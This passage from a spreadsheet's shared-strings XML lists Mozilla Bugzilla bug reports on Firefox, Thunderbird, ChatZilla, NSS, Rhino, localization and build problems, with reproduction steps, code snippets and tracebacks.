    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-276250</t>
  </si>
  <si>
    <t>Update 1.0 missing cache-control headers</t>
  </si>
  <si>
    <t>Update 0.9 had cache-control headers added to it around the Firefox 1.0 launch
(Nov. 9) these didn't get landed on the trunk for Update 1.0.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-378651</t>
  </si>
  <si>
    <t>nb-NO / Norwegian BokmÃ¥l</t>
  </si>
  <si>
    <t>Copyright year in nb-NO Sunbird 0.5pre build is wrong</t>
  </si>
  <si>
    <t xml:space="preserve">Copyright year in nb-NO Sunbird 0.5pre build is wrong should be 2007
</t>
  </si>
  <si>
    <t>bokmaal</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-326915</t>
  </si>
  <si>
    <t>Dutch (nl) translation of Thunderbird and Firefox mozilla_1_8_branch</t>
  </si>
  <si>
    <t>Op weg naar versie 2.0!</t>
  </si>
  <si>
    <t>dutch.nl</t>
  </si>
  <si>
    <t>CORE-232182</t>
  </si>
  <si>
    <t>Can't display non-ascii characters in JS exceptions</t>
  </si>
  <si>
    <t>User-Agent:       
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 cs-CZ rv:1.6) Gecko/20040113
JS console displayes non-ascii characters in a wrong way. This means problem
because some Mozilla JS-messages are localizable.
Reproducible: Always
Steps to Reproduce:
1. Open JSconsole
2. In the textbox write some expresion which returns some output with accented
characters e.g. '×œÂ¹×˜×¨Â¾â€Ž×‘××™×ª×©'
3. Press Evaluate
Actual Results:  
The characters are not displayed correctly in the JS console (see screenshot in
attachement)
I have tried \uXXXX version of characters too:
'\u011B\u0161\u010D\u0159\u017E\u00FD\u00E1\u00ED\u00E9\u00FA\u016F'
but with the same result.
This is the problem because some Mozilla messages displayed in the JS console
are localizable  - e.g. some from
http://lxr.mozilla.org/mozilla/source/caps/src/caps.properties so these
localized error messages are not displayed correctly</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-411663</t>
  </si>
  <si>
    <t>Missing Breakpad/Crashreporter Report</t>
  </si>
  <si>
    <t>I crashed about 3 hours ago and breadpad has send the crashstack with the ID http://crash-stats.mozilla.com/report/index/659118a3-bf65-11dc-9855-001a4bd43ed6?date=2008-01-10-10
So far this report is not processed and i still get 404 not found...</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-214256</t>
  </si>
  <si>
    <t>nicks actions notices are not recoded according to charset</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U FreeBSD i386 en-US rv:1.3b) Gecko/20030218
Build Identifier: Mozilla/5.0 (X11 U FreeBSD i386 en-US rv:1.3b) Gecko/20030218
The ChatZilla IRC client incorrectly handles /charset command entered: while
being in /charset koi8-r mode cyrillic channel messages are displayed normally
cyrillic channel topic is mangled (0.8.13c) or not displayed (0.9.15) in the
channel window but is displayed normally in menu/title of ChatZilla cyrillic
nicks aren't displayed normally.
Next important IRC commands aren't supported: /mode /umode (usermode) /stats
/trace /oper /notice. While it's still possible to /notice somebody or get
some /stats from a server (ChatZilla claims it's unknown but passed to a
server) the /oper command requires operator's password as a parameter. When a
client supports this command it asks for the password and hides it when typing.
Unfortunately ChatZilla doesn't support this.
Reproducible: Always
Steps to Reproduce:
1. /charset koi8-r connect to some Russian IRC network and try with cyrillic
nicks cyrillic topics etc
2. Try /notice nick message command and see the effect
3. Try /oper command and see the effect.
Expected Results:  
ChatZilla should display nicks and topics with the specified /charset. In other
words /charset command covers not only channel and private messages/notices.
ChatZilla should recognize RFC 1459 commands of IRC protocol especially /mode
/notice /trace /stats.
ChatZilla should ask for IRC operator's password when /oper command is entered
and hide the password as it typed.
Dunno whether it is connected event but I have Mozilla 1.4 release I download
latest ChatZilla it's getting installed I start it and can't type anything in
there. Version 0.8.13 supported user input normally.</t>
  </si>
  <si>
    <t>gvs</t>
  </si>
  <si>
    <t>CORE-328551</t>
  </si>
  <si>
    <t>nsHTMLReflowState::mCompactMarginWidth is unused</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG_GRAVEYARD-681859</t>
  </si>
  <si>
    <t>Start Page does not collapse left margin</t>
  </si>
  <si>
    <t>Created attachment 555636
StartPageCutOff.png
User Agent: Mozilla/5.0 (Windows NT 6.1 WOW64) AppleWebKit/535.1 (KHTML like Gecko) Chrome/14.0.835.109 Safari/535.1
Steps to reproduce:
I fullscreened Thunderbird 6.0 on Windows 7 with a 1050x1680 resolution. I used the Vertical View layout and enabled the Message Pane.
Actual results:
The right side of the Thunderbird Start Page got cut off.
Expected results:
The left margin should have collapsed to about 20px before it resorted to cutting off the right side of the Start Page.</t>
  </si>
  <si>
    <t>sancus</t>
  </si>
  <si>
    <t>4kmvawa02</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-185583</t>
  </si>
  <si>
    <t>steag.de - the elements are overlapping and some elements are not clickable</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.3a) Gecko/20021212
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.3a) Gecko/20021212
some elements are overlapping and the elements of the menu on the left side are
not clickable
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>gereon.ruetten</t>
  </si>
  <si>
    <t>CORE-100983</t>
  </si>
  <si>
    <t>enabling quirks stylesheet messages are annoying and should die</t>
  </si>
  <si>
    <t>TOOLKIT-245317</t>
  </si>
  <si>
    <t>Extension safe mode (-no-extensions switch) causes infinite spawn loop</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Win98 en-US rv:1.7) Gecko/20040601 Firefox/0.8.0+
Build Identifier: Mozilla/5.0 (Windows U Win98 en-US rv:1.7) Gecko/20040601 Firefox/0.8.0+
Starting Firefox with the -no-extensions switch causes Firefox to continually
spawn new instances of itself until manually killed (which is difficult unless
FF is creating console windows as well).
Reproducible: Always
Steps to Reproduce:
1. Start Firefox with the -no-extensions switch
Actual Results:  
Firefox opens a new instance closes the current instance opens a new instance
closes the current instance etc.
Expected Results:  
Firefox starts normally with extensions disabled.</t>
  </si>
  <si>
    <t>NSS-370717</t>
  </si>
  <si>
    <t>ssl2_StartGatherBytes() is dead or the comment is out of date</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X en-US rv:1.8.0.9) Gecko/20061206 Firefox/1.5.0.9
Build Identifier: firefox 2.0.0.1
* Called from SocksStartGather in sslsocks.c
 * Caller must hold RecvBufLock. 
 */     
int     
ssl2_StartGatherBytes(sslSocket *ss sslGather *gs unsigned int count)
{           }
But this function is not called  in sslsocks.c. Actually sslsocks.c does not exist. I do find sslsock.c but it is NOT called in it.
Reproducible: Always</t>
  </si>
  <si>
    <t>lintan2</t>
  </si>
  <si>
    <t>THUNDERBIRD-378192</t>
  </si>
  <si>
    <t>Thunderbird 2.0.0.0 Standard install installer error opening file for writing \r\n\nxpicleanup.exe\r\n\r\nClick Retry to try again\r\nor Cancel to stop installation.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
Build Identifier: 
The error is repeatable even after second download.
After removal install of 1.5 completes but opening Thunderbird errors on Installation i
System is PC running XP with SP2.
Reproducible: Always
Steps to Reproduce:
1.download Thunderbird 2.0.0. from mozilla.com
2.install (standard)
3.
Actual Results:  
see description for error message. This occurres even after using XP Control Panel to remove the previous (version 1.5) install of Thunderbird.
Expected Results:  
Operational Thunderbird</t>
  </si>
  <si>
    <t>tkane</t>
  </si>
  <si>
    <t>BUGZILLA-369080</t>
  </si>
  <si>
    <t>Add the possibility to split emails with the semicolon character</t>
  </si>
  <si>
    <t>When using fields that may contain emails (CC Assigned QA contact ...) add the possibility to interpret the semicolon character (transforming it to the normal).
I am requesting this feature because I have seen a user inserting emails with this character and got an error of not having found the user user@domain.com and it's not very intuitive (he didn't know what was happenning).</t>
  </si>
  <si>
    <t>krzysdrewniak</t>
  </si>
  <si>
    <t>CORE-472167</t>
  </si>
  <si>
    <t>nsIForm outparamdel didn't change IID.</t>
  </si>
  <si>
    <t>Created attachment 355426
fix IID
Same issue as bug 472120</t>
  </si>
  <si>
    <t>CORE-317452</t>
  </si>
  <si>
    <t>nsParser::Tokenize is recursive for no reason</t>
  </si>
  <si>
    <t>jag pointed out to me on IRC that nsParser::Tokenize is recursive for no apparent good reason. I have a patch to fix this.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-391737</t>
  </si>
  <si>
    <t>Doctor can't re-add files that were deleted previously (and are now in the Attic)</t>
  </si>
  <si>
    <t>Content-Type: text/html charset=UTF-8
Doctor - Template Processing Failed
Unfortunately Doctor has experienced an internal error from which it was unable to recover. More information about the error is provided below. Please forward this information along with any other information that would help diagnose and fix this problem to the system administrator at sysadmins@mozilla.org.
undef error - Can't open mozilla-org/html/start-snippets/en/snippet-4.html: No such file or directory at Doctor/File.pm line 316.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-457696</t>
  </si>
  <si>
    <t>Linux L10n 1.9.0 builds are missing</t>
  </si>
  <si>
    <t>Linux l10n-linux-tbox Dep Fx-Moz1.9.0-l10n is not reporting to l10n tinderboxen
The last report to sk tbox: 2008/09/23 01:59:08</t>
  </si>
  <si>
    <t>FIREFOX-352906</t>
  </si>
  <si>
    <t>Text size toolbar failed in Firefox 2.0</t>
  </si>
  <si>
    <t>Extension (Text size toolbar 0.5) is installed but not working. No Text Size Buttons on the Toolbar visible.</t>
  </si>
  <si>
    <t>redux</t>
  </si>
  <si>
    <t>CORE-505798</t>
  </si>
  <si>
    <t>JSAPI test harness</t>
  </si>
  <si>
    <t>I've had this lying around gathering dust for a few months and I think it's probably time to check it in.
Unfortunately I used C++ exceptions but I think I can change those to assertions without too much fuss.</t>
  </si>
  <si>
    <t>CORE-139243</t>
  </si>
  <si>
    <t>xpconnect should not do JS rooting for wrapped natives</t>
  </si>
  <si>
    <t>bug 112152 talks about improving threadsafety for wrapped JS objects and getting
rid of JS rooting there. That is kind of tough. But we can pretty easily kill
the need to do refcount based calls to add and remove JS roots for wrapped
*natives*.
Instead of rooting we can do timely marking. This is better because it avoids
the lock overhead inherent in the JS rooting call. And it only happens at GC
time rather than each time the refcount on the wrapped natives makes a 1-&gt;2 or
2-&gt;1 transition.
We might see some measureable improvement in DOM manipulation benchmarks.
I'll attach a patch. I was working on dealing with bug 112152 too. So this
patch has some associated code that will be needed for that fix but which is
not *strictly* needed yet for this smaller fix. We should test this more and see
if anything unexpectedly expodes :)</t>
  </si>
  <si>
    <t>TOOLKIT-431861</t>
  </si>
  <si>
    <t>filename not defined in symbolstore.py's GetCleanRoot (or GetCleanRoot assumes the presence of an @ in a CVS/Root)</t>
  </si>
  <si>
    <t>Hit this error on our staging setup for trunk release automation:
building symbol store
mkdir -p ./dist/crashreporter-symbols/2008043004
/tools/python/bin/python /builds/tinderbox/Fx-Mozilla1.9-Release/Linux_2.6.18-53.1.14.el5_Depend/mozilla/toolkit/crashreporter/tools/symbolstore.py    \
          --vcs-info -s /builds/tinderbox/Fx-Mozilla1.9-Release/Linux_2.6.18-53.1.14.el5_Depend/mozilla ./dist/host/bin/dump_syms     \
          ./dist/crashreporter-symbols/2008043004                    \
          ./dist/bin &gt;                                    \
          ./dist/crashreporter-symbols/2008043004/firefox-3.0-Linux-2008043004-symbols.txt
Unexpected error:  
Traceback (most recent call last):
  File /builds/tinderbox/Fx-Mozilla1.9-Release/Linux_2.6.18-53.1.14.el5_Depend/mozilla/toolkit/crashreporter/tools/symbolstore.py line 644 in 
    main()
  File /builds/tinderbox/Fx-Mozilla1.9-Release/Linux_2.6.18-53.1.14.el5_Depend/mozilla/toolkit/crashreporter/tools/symbolstore.py line 640 in main
    dumper.Process(arg)
  File /builds/tinderbox/Fx-Mozilla1.9-Release/Linux_2.6.18-53.1.14.el5_Depend/mozilla/toolkit/crashreporter/tools/symbolstore.py line 386 in Process
    return self.ProcessDir(file_or_dir)
  File /builds/tinderbox/Fx-Mozilla1.9-Release/Linux_2.6.18-53.1.14.el5_Depend/mozilla/toolkit/crashreporter/tools/symbolstore.py line 400 in ProcessDir
    if not self.ProcessFile(fullpath):
  File /builds/tinderbox/Fx-Mozilla1.9-Release/Linux_2.6.18-53.1.14.el5_Depend/mozilla/toolkit/crashreporter/tools/symbolstore.py line 446 in ProcessFile
    (filename rootname) = GetVCSFilename(filename self.srcdir)
  File /builds/tinderbox/Fx-Mozilla1.9-Release/Linux_2.6.18-53.1.14.el5_Depend/mozilla/toolkit/crashreporter/tools/symbolstore.py line 297 in GetVCSFilename
    file = fileInfo.filename
  File /builds/tinderbox/Fx-Mozilla1.9-Release/Linux_2.6.18-53.1.14.el5_Depend/mozilla/toolkit/crashreporter/tools/symbolstore.py line 108 in __getattr__
    filename = self.GetFilename()
  File /builds/tinderbox/Fx-Mozilla1.9-Release/Linux_2.6.18-53.1.14.el5_Depend/mozilla/toolkit/crashreporter/tools/symbolstore.py line 179 in GetFilename
    if self.revision and self.clean_root:
  File /builds/tinderbox/Fx-Mozilla1.9-Release/Linux_2.6.18-53.1.14.el5_Depend/mozilla/toolkit/crashreporter/tools/symbolstore.py line 96 in __getattr__
    clean_root = self.GetCleanRoot()
  File /builds/tinderbox/Fx-Mozilla1.9-Release/Linux_2.6.18-53.1.14.el5_Depend/mozilla/toolkit/crashreporter/tools/symbolstore.py line 161 in GetCleanRoot
    print &gt;&gt; sys.stderr Failed to get CVS Root for %s % filename
NameError: global name 'filename' is not defined
Failed to write symbol file.
make: *** [buildsymbols] Error 1
make: Leaving directory `/builds/tinderbox/Fx-Mozilla1.9-Release/Linux_2.6.18-53.1.14.el5_Depend/mozilla/obj-fx-trunk'
make -C /builds/tinderbox/Fx-Mozilla1.9-Release/Linux_2.6.18-53.1.14.el5_Depend/mozilla/obj-fx-trunk uploadsymbols
make: Entering directory `/builds/tinderbox/Fx-Mozilla1.9-Release/Linux_2.6.18-53.1.14.el5_Depend/mozilla/obj-fx-trunk'
/builds/tinderbox/Fx-Mozilla1.9-Release/Linux_2.6.18-53.1.14.el5_Depend/mozilla/toolkit/crashreporter/tools/upload_symbols.sh /builds/tinderbox/Fx-Mozilla1.9-Release/Linux_2.6.18-
53.1.14.el5_Depend/mozilla/../2008043004/crashreporter-symbols-firefox-3.0-Linux-2008043004.zip
Transferring symbols... /builds/tinderbox/Fx-Mozilla1.9-Release/Linux_2.6.18-53.1.14.el5_Depend/mozilla/../2008043004/crashreporter-symbols-firefox-3.0-Linux-2008043004.zip
/builds/tinderbox/Fx-Mozilla1.9-Release/Linux_2.6.18-53.1.14.el5_Depend/mozilla/../2008043004/crashreporter-symbols-firefox-3.0-Linux-2008043004.zip: No such file or directory
make: *** [uploadsymbols] Error 1
The CVS/Root on this box is
  staging-1.9-master.build.mozilla.org:/builds/cvsmirror/cvsroot
so len(parts) is only 1 in
  http://mxr.mozilla.org/seamonkey/source/toolkit/crashreporter/tools/symbolstore.py#156
We can fix up our non-standard Root if you don't think it's worth supporting this situation so this is mainly about making sure filename is defined.
Also what happens to the exit status when there is a problem generating source server information ? We need some way to know that a failure occurred given no-one is actively monitoring build logs.</t>
  </si>
  <si>
    <t>CORE-400552</t>
  </si>
  <si>
    <t>setting document.domain inconsistent in face of IDN whitelist</t>
  </si>
  <si>
    <t>The rules for setting document.domain are enforced by string matching against the current domain which is originally set based on the URI as normalized by the IDN rules.
Code that works at www.mÃ¼ller.de may or may not work depending on whether the current browser supports IDN or not and would require different code from www.mÃ¼ller.com (which will be www.xn--mller-kva.com in Firefox). If we add or remove a TLD from the IDN whitelist the site would also have to adjust their code.
A site author could check document.domain first to see whether it's an IDN domain or not and given differing support in different browser perhaps they have to do that anyway.
http://www.mÃ¼ller.de
--------------------
 document.domain = mÃ¼ller.de       // works
 document.domain = xn--mller-kva.de // throws
http://www.xn--mller-kva.com
----------------------------
 document.domain = mÃ¼ller.com        // throws
 document.domain = xn--mller-kva.com //works
Setting document.location works fine for all four versions.</t>
  </si>
  <si>
    <t>CORE-31225</t>
  </si>
  <si>
    <t>Cannot resolve URL with non-ascii ISO-8859-1 characters</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (X11 N Linux 2.2.14 i686 en-US m14)
BuildID:    2000030909
In the URL mentioned http://www.nunames.nu/Local-Language.htm there is a link
to another URL: http://www.nunÃ¤mes.eu.nu which will result in the error
message: www.nun%c3%c2%a4mes.eu.nu could not be found..
I have tested the same URL with both Netscape 4.7 and MSIE5 and they both
resolve it fine.
Reproducible: Always
Steps to Reproduce:
1.Visit http://www.nunames.nu/Local-Language.htm
2.Locate the link to http://www.nunÃ¤mes.eu.nu at middle of page
3.Click link
Actual Results:  I got an error message as indicated above.
Expected Results:  The URL should resolve</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-281307</t>
  </si>
  <si>
    <t>vt.edu - label for one element containing another</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1 SV1)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.5) gecko/20041107 Firefox/1.0
When trying option other in a multiple-choice style of form Firefox is 
unable to click in the field to type and enter text.  The flashing text line 
appears for a split-second then disappears and the focus is back on the dot 
to the left of other.
Reproducible: Always
Steps to Reproduce:
1. Browse to https://survey.vt.edu/survey/entry.jsp?id=1081428861317
2. Click the dot to the left of other.
3. Attempt to click the field to the right of other.
Actual Results:  
Firefox is unable to keep the focus on the text field to type into.
Expected Results:  
It works with IE but not with Netscape.</t>
  </si>
  <si>
    <t>thumperwar3z</t>
  </si>
  <si>
    <t>SEAMONKEY-405104</t>
  </si>
  <si>
    <t>Page Info</t>
  </si>
  <si>
    <t>Error: theDocument is not defined and other js errors in pageInfo</t>
  </si>
  <si>
    <t>Error: theDocument is not defined
Source file: chrome://navigator/content/pageinfo/pageInfo.js
Line: 651
From:
-// mmm yummy. global variables.
-var theWindow = null
-var theDocument = null
[...]
+// mmm yummy. global variables.
+var gWindow = null
+var gDocument = null
Should use gDocument instead.</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-445173</t>
  </si>
  <si>
    <t>pork-barrel: select: bad file descriptor</t>
  </si>
  <si>
    <t>Created attachment 329479
this might help
This is really hard to reproduce so I never looked into it in detail.</t>
  </si>
  <si>
    <t>FIREFOX-276506</t>
  </si>
  <si>
    <t>Extra blank tabs not removed when opening bookmark folder in background</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
When opening a bookmark folder in tabs unused blank tabs are not removed as
intended when tabs are loaded in the background
(browser.tabs.loadBookmarksInBackground = true). For example if three blank
tabs are opened by selecting New Tab from the File menu three times and a
folder of two bookmarks is opened the third unused tab should be removed
regardless of the value of the loadBookmarksInBackground.
I believe the problem is due to a misplaced line in
bookmarks.js::openGroupBookmark():
653       // focus the first tab if prefs say to
654       if (!loadInBackground || doReplace) {
655         // Select the first tab in the group.
656         var tabs = browser.mTabContainer.childNodes
657         browser.selectedTab = tabs[index0]
658       }
659 
660       // Close any remaining open tabs that are left over.
661       // (Always skipped when we append tabs)
662       for (var i = tabCount-1 i &gt;= index --i)
663         browser.removeTab(tabs[i])
664 
The variable tabs should be declared outside the if (!loadInBackground ||
doReplace) statement so that it can still be used in the subsequent call to
browser.removeTab() when loading tabs in background and doReplace is false.
Reproducible: Always
Steps to Reproduce:
See above.</t>
  </si>
  <si>
    <t>TOOLKIT-348861</t>
  </si>
  <si>
    <t>Software Update displays a small window and doesn't update.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20060816 Minefield/3.0a1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20060816 Minefield/3.0a1
Clicking Check for Updates... yields a small window (see screenshot) and does not actually perform the update.
Reproducible: Always
Steps to Reproduce:
1. Click Check for Updates... from the Help menu.
Actual Results:  
Single small window appears and Minefield is not updated.
Expected Results:  
Software Update dialog appears and Minefield is updated.</t>
  </si>
  <si>
    <t>mlemieu</t>
  </si>
  <si>
    <t>FIREFOX-278599</t>
  </si>
  <si>
    <t>focus doesn't switch to content area after clicking on bookmark item in sidebar</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8b) Gecko/20050114 Firefox/1.0+
When I press Enter key on bookmark item the focus switches.
No problem with History Sidebar.
Reproducible: Always
Steps to Reproduce:
1. Open Bookmarks Sidebar
2. Click bookmark item
Actual Results:  
Focus remains on bookmark item.
Expected Results:  
Focus switches to content area.</t>
  </si>
  <si>
    <t>vladimir+bm</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-193112</t>
  </si>
  <si>
    <t>thomashillebrandt.com - JavaScript induced text (using InnerHTML and document.layers / writeln) fails to render making the page useless!</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.3b) Gecko/20030210
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.3b) Gecko/20030210
In the pages under Discography on http://www.thomashillebrandt.com/ the
right-hand menubar (Tracks History Music Instruments) uses JavaScript as
described below to render text. This works fine in IE5 but not in Mozilla 1.3b.
A sample routine is as follows:
Do it!
function displaytext()
{
    var output = 'This is my text' +
                 'I want this to show'
    if (document.all)
        document.all('Info').innerHTML = output
    else if (document.layers) {
        document.layers['Info'].document.open()
        document.layers['Info'].document.writeln(output)
        document.layers['Info'].document.close()
    }
}
Reproducible: Always
Steps to Reproduce:
1. Load the page.
2. Press the link.
3. Watch nothing happen.
Actual Results:  
Nothing
Expected Results:  
Insert the HTML code in the 'output' variable into the table labled Info thus
displaying it on the screen.</t>
  </si>
  <si>
    <t>RHINO_GRAVEYARD-33239</t>
  </si>
  <si>
    <t>Bad trees cause NullPointerException</t>
  </si>
  <si>
    <t>Subject:
             a rhino bug with parsing
        Date:
             Fri 24 Mar 2000 15:25:58 -0500
       From:
             Kumanan Yogaratnam 
 Organization:
             Espial Group Inc.
         To:
             norris@netscape.com
hi norris
the following was reported by our QA dept:
(just so you know we do not use the optimizer.)
---------------------------------- 8&lt;--------------
Test case for a JavaScript Bug:
The JS engine failed with the following piece of code:
    alert(inside js file)
    var anArray = new Array()
    var pos = 1
    anArray[0] = 5
    anArray[1] = 6
    ++anArray[--pos]
    alert(anArray[pos])
The above script works fine within netscape but it throws the following
exception with our browser which uses rhino:
java.lang.NullPointerException
 at org.mozilla.javascript.Interpreter.generateICode(Compiled Code)
 at org.mozilla.javascript.Interpreter.generateICode(Compiled Code)
 at org.mozilla.javascript.Interpreter.generateICode(Compiled Code)
 at org.mozilla.javascript.Interpreter.generateICode(Compiled Code)
 at org.mozilla.javascript.Interpreter.generateICode(Compiled Code)
 at org.mozilla.javascript.Interpreter.generateICodeFromTree(Compiled
Code)
 at
org.mozilla.javascript.Interpreter.generateScriptICode(Interpreter.java)
 at org.mozilla.javascript.Interpreter.compile(Interpreter.java)
 at org.mozilla.javascript.Context.compile(Context.java)
 at org.mozilla.javascript.Context.compile(Context.java)
 at org.mozilla.javascript.Context.compileReader(Context.java)
------------------------ 8&lt;---------------
regards
kumanan
--
Kumanan Yogaratnam  
Espial Group Inc.
http://www.espial.com</t>
  </si>
  <si>
    <t>NSS-174806</t>
  </si>
  <si>
    <t>AES keys don't have CKA_VALUE_LEN</t>
  </si>
  <si>
    <t>AES keys should have the CKA_VALUE_LEN attribute to say how long they are so
that PK11_GetKeyLength and PK11_GetKeyStrength work properly. I think this
should happen in pkcs11.c:validateSecretKey where it happens for all the other
variable-length secret key types.</t>
  </si>
  <si>
    <t>CORE-497060</t>
  </si>
  <si>
    <t>Disable JIT on non-global initial scope chain</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.1b99) Gecko/20090605 Firefox/3.5b99
Build Identifier: Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.1b99) Gecko/20090605 Firefox/3.5b99
On OS X Selenium IDE crashes the latest beta of Firefox
Reproducible: Always
Steps to Reproduce:
1. Install Selenium IDE in the latest Firefox 3.5b99
2. Choose Selenium IDE from the Tools menu of Firefox
Actual Results:  
Firefox crashes
Expected Results:  
Selenium IDE starts
I couldn't reproduce the issue on Ubuntu 9.04 and Windows 7 RC in VirtualBox virtual machines.
I also submitted bug report in the Selenium JIRA as http://jira.openqa.org/browse/SIDE-317.</t>
  </si>
  <si>
    <t>andras.hatvani</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-461881</t>
  </si>
  <si>
    <t>is / Icelandic</t>
  </si>
  <si>
    <t>Shortcut for Hide Application differ from the standard mac key combo</t>
  </si>
  <si>
    <t>(filing one bug per locale please see the list below for your locale)
The mac shortcut keys for hiding the current application is a fairly standardized shortcut combo (accel+H). The same goes for Hide all other applications (accel+alt+H). Doing a mxr search for hideThisAppCmdMac.commandkey in l10n shows quite a few locales that has different keys. Note that for some locales there might be exceptions (ar and el maybe?) but I think most of the locales should use H. Note also that the keys for opening preferences and quitting the application are also standardized on mac afaik.
Summary: (locale and directory)
af - browser
ar - browser
bg - browser
da - browser
de - calendar
el - browser
es-AR - mail
et - calendar
fr - mail calendar
fy-NL = browser mail calendar
id - mail
is - calendar
it - mail calendar
ku - browser
nb-NO and nn-NO - mail calendar
nl - mail calendar
pl - mail calendar
pt-PT - browser mail calendar
sr - mail
tr - mail calendar
uk - calendar
Summary:
The following keys are standardized:
hideThisAppCmdMac.commandkey (accel+H)
hideOtherAppsCmdMac.commandkey (accel+alt+H)
preferencesCmdMac.commandkey (accel+
Quit commandkey (doesn't have the entity handy atm the keys are accel+Q).
Note: I haven't checked suite/ yet because the entities are named different.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-374109</t>
  </si>
  <si>
    <t>Policy</t>
  </si>
  <si>
    <t>Establish review policy for Remora</t>
  </si>
  <si>
    <t>Currently we have several people flagged as editors who are reviewing on the preview site (which will become real AMO) but we have not established a review policy for Remora.
I suspect that currently editors are treating Push to Public as approve and Retain in Sandbox as deny. In other words unless there is something wrong with an add-on it is getting pushed to public which is not how the system was designed to be used.
Also all reviews (the comment kind) are moderated by default but editors have been given no instructions as to what kind of reviews should be approved (users will assume they are the same as in v2).
I think we need to stop all reviews until this policy is established otherwise we will be treating add-ons submitted after the policy is created unfairly.
This needs to be taken care of ASAP because we probably do want reviews to continue before the launch.</t>
  </si>
  <si>
    <t>WEBSITES_GRAVEYARD-549800</t>
  </si>
  <si>
    <t>opentochoice.org</t>
  </si>
  <si>
    <t>Add a screenshot of the Browser Choice screen in the Browsers category description</t>
  </si>
  <si>
    <t>The copy (p.2) mentions a graphic of the screenshot of the Browser Choice screen which will be hyperlinked to from the description of the Browsers category. For now I replaced the link elements () with  so that we remember where they were in the translations.</t>
  </si>
  <si>
    <t>THUNDERBIRD-301945</t>
  </si>
  <si>
    <t>Account Wizard won't offer to create new RSS or Movemail accounts</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8b4) Gecko/20050724 Firefox/1.0+
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8b4) Gecko/20050724 Firefox/1.0+
Thunderbird(HEAD/20050724): this bug shows only when I run the program from
it's *installed* location (/usr/local/bin/thunderbird).  When I run it as
obj/dist/bin/thunderbird then the Account Wizard offers all four types of
new accounts -- weird!
Reproducible: Always
Steps to Reproduce:
1.Compile and install with 'make -f client.mk install'
2.Run TB from /usr/local/bin/thunderbird
3.Try adding an RSS account from the Account Wizard -- you can't.
4.Run TB from obj/dist/bin/thunderbird -- and it works normally.
Actual Results:  
Account Wizard offers only 'Newsgroups' and 'Email' accounts.  RSS and
Movemail accounts are not mentioned.
Expected Results:  
Account Wizard should offer all types of accounts.
My gut feeling is that the 'make install' target is broken for the Account
Wizard -- but I don't know which Makefiles are involved.</t>
  </si>
  <si>
    <t>wsheets</t>
  </si>
  <si>
    <t>FIREFOX-419957</t>
  </si>
  <si>
    <t>History sidebar By Site should use visit_count to avoid display of empty sites</t>
  </si>
  <si>
    <t>Created attachment 306133
Use visit_count to filter out empty hosts
When history sidebar shows results By Site it does not join with history visits to be superfast. However if you import bookmarks or clear your history the view will show all the sites.
We can stay superfast but avoid displaying those hosts by using visit_count from the moz_places table. This could speed up By Date and Site view too.</t>
  </si>
  <si>
    <t>SEAMONKEY-73520</t>
  </si>
  <si>
    <t>User agent field reports it as 0.8.1. should be 0.9</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (X11 U Linux 2.4.2-ac20 i686 en-US 0.8.1)
BuildID:    2001032608
When submitting another bugreport I noticed that the user agent field says 0.8.1
when it should say 0.9 (acording to bz on #mozillazine )
Reproducible: Always
Steps to Reproduce:
1.go to the bug report page (or whatever other means you have of looking at the
user agent field) and oogle
2.
3.
Actual Results:  Mozilla/5.0 (X11 U Linux 2.4.2-ac20 i686 en-US 0.8.1)
